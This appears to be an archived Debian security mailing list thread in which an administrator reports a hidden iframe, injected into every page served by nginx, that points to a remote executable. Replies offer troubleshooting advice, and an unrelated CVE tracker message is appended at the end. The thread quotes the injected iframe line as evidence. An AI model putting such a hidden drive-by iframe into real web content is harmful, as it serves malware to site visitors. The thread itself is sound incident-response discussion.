debian wheezy i386 nginx iframe rootkit
Last fall there was a debian 64-bit / nginx rootkit going around, now I've been hit with what sounds similar but on 32-bit wheezy. Here's a link to info on the previous 64-bit rootkit: https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections All files served by nginx have this line inserted at the top: iframe src= http://122.226.137.123:/yixi.exe width=0 height=0/iframe Whatever it was isn't there anymore: Connecting to 122.226.137.123:... failed: Connection refused. I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another Debian Wheezy i386 machine in a safe environment and did a diff -r. No difference. No ismod line in /etc/rc.local I haven't been able to find anything. Googling doesn't show anything similar for debian wheezy i386, only sqeeze 64-bit. I was using nginx-light from dotdeb.org. I uninstalled nginx and tried the nginx-light from debian wheezy but it made no difference. This machine was built on July 19th. I've uninstalled nginx. I'll hold off rebuilding for now, maybe somebody here has some ideas? E Frank Ball fra...@efball.com -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20130911224820.gf30...@kamajii.efball.com
Re: debian wheezy i386 nginx iframe rootkit
On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III fra...@efball.com wrote: Last fall there was a debian 64-bit / nginx rootkit going around, now I've been hit with what sounds similar but on 32-bit wheezy. Here's a link to info on the previous 64-bit rootkit: https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections All files served by nginx have this line inserted at the top: iframe src= http://122.226.137.123:/yixi.exe width=0 height=0/iframe Whatever it was isn't there anymore: Connecting to 122.226.137.123:... failed: Connection refused. I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another Debian Wheezy i386 machine in a safe environment and did a diff -r. No difference. No ismod line in /etc/rc.local I haven't been able to find anything. Googling doesn't show anything similar for debian wheezy i386, only sqeeze 64-bit. I was using nginx-light from dotdeb.org. I uninstalled nginx and tried the nginx-light from debian wheezy but it made no difference. This machine was built on July 19th. I've uninstalled nginx. I'll hold off rebuilding for now, maybe somebody here has some ideas? E Frank Ball fra...@efball.com Just out of curiosity, did you back up nginx and check it as well? -- Joel Rees Be careful where you see conspiracy. Look first in your own heart. -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/caar43iojy_q8kuu47y+ah+v0e81vtnwykh2f6lvvcowqans...@mail.gmail.com
Re: debian wheezy i386 nginx iframe rootkit
On Thu, Sep 12, 2013 at 09:13:46AM +0900, Joel Rees wrote: On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III fra...@efball.com wrote: Last fall there was a debian 64-bit / nginx rootkit going around, now I've been hit with what sounds similar but on 32-bit wheezy. All files served by nginx have this line inserted at the top: iframe src= http://122.226.137.123:/yixi.exe width=0 height=0/iframe I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another Debian Wheezy i386 machine in a safe environment and did a diff -r. No difference. No ismod line in /etc/rc.local I haven't been able to find anything. Googling doesn't show anything similar for debian wheezy i386, only sqeeze 64-bit. I was using nginx-light from dotdeb.org. I uninstalled nginx and tried the nginx-light from debian wheezy but it made no difference. Just out of curiosity, did you back up nginx and check it as well? -- Joel Rees No, I just uninstalled nginx from dotdeb and installed from Debian. The webpages are all static and remain unchanged, the nginx config files are OK. The new line is added by some process I can't find. The lynx webrowser shows this as the first line of the webpages: IFRAME: http://122.226.137.123:/yixi.exe It also appears in downloads using wget. view source in firefox or chrome show nothing amiss. It only appears on IPv4, not IPv6. I do not have php installed. The http header is completely different: curl -I shows this: HTTP/1.1 200 OK Content-Type: text/html; charset=en_US.UTF-8 Content-Length: 3634 When it should look more like this: HTTP/1.1 200 OK Server: nginx/1.4.2 Date: Wed, 11 Sep 2013 23:39:48 GMT Content-Type: text/html; charset=en_US.UTF-8 Content-Length: 3291 Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT Connection: keep-alive Vary: Accept-Encoding ETag: 5101a7f4-cdb Accept-Ranges: bytes I installed chkrootkit, rkhunter, unhide.rb and they found nothing. E Frank Ball fra...@efball.com -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20130912003916.gh30...@kamajii.efball.com
Re: debian wheezy i386 nginx iframe rootkit
Quoting E Frank Ball III (fra...@efball.com): Last fall there was a debian 64-bit / nginx rootkit going around, now I've been hit with what sounds similar but on 32-bit wheezy. I hope you're aware that -- at least in the standard usage of the word 'rootkit' -- a rootkit doesn't 'go around', but rather is a set of concealment software an intruder installs after breaking in via other means, in order to hide his/her presence and processes. Here's a link to info on the previous 64-bit rootkit: https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections Article cites Crowdstrike Blog as its source of information but then gives the incorrect URL. Here's the correct one: http://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/index.html (Note that the page concludes that the means of entry and escalation to root access in the host studied is unknown.) This machine was built on July 19th. I've uninstalled nginx. I'll hold off rebuilding for now, maybe somebody here has some ideas? Well, for starters, if you think the machine has been root compromised, you really cannot trust data gathered from the live system. -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20130912002644.gj7...@linuxmafia.com
External check
CVE-2013-3361: RESERVED CVE-2013-3362: RESERVED CVE-2013-3363: RESERVED CVE-2013-4181: RESERVED CVE-2013-4291: RESERVED CVE-2013-5324: RESERVED -- The output might be a bit terse, but the above ids are known elsewhere, check the references in the tracker. The second part indicates the status of that id in the tracker at the moment the script was run. -- To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/52301139.cynh6wa7os2gwjil%atomo64+st...@gmail.com
